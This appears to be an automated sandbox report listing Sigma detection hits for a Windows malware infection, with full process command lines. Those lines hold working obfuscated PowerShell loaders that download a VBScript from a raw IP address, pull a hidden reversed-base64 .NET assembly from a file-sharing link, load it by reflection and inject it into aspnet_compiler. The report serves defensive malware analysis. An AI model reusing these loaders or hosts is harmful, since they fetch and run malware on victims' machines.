Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT, ProcessId: 5732, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , ProcessId: 5560, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3092, ProcessName: aspnet_compiler.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtT

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", ProcessId: 2364, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , ProcessId: 5560, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; 